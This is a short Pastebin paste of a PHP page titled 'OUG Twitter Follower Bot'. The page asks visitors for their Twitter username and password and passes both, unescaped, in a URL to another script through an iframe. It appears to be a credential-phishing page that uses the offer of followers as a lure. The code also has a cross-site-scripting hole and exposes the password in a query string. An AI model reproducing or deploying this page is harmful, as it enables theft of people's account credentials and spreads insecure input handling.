Advertisement
Guest User

Untitled

a guest
Jun 21st, 2017
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.46 KB | None | 0 0
  1. <?
  2.  
  3. if($_POST['u'] != ""){
  4. $u = $_POST['u'];
  5. $p = $_POST['p'];
  6. echo '
  7.  
  8.  
  9. <iframe src="index2.php?u='.$u.'&p='.$p.'" width="100%" height="100%">
  10. </iframe>';
  11.  
  12. }else{
  13.  
  14.  
  15. ?>
  16. <center>
  17.  
  18.  
  19. <font face="verdana">
  20.  
  21. <h1> OUG Twitter Follower Bot </h1>
  22.  
  23. <form method="post" action="index.php">
  24. Add Your Account To The List : <br>
  25. Username : <input type="text" name="u">
  26. Password : <input type="password" name="p">
  27. <input type="submit" value="Submit">
  28.  
  29.  
  30. <?
  31. }
  32. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement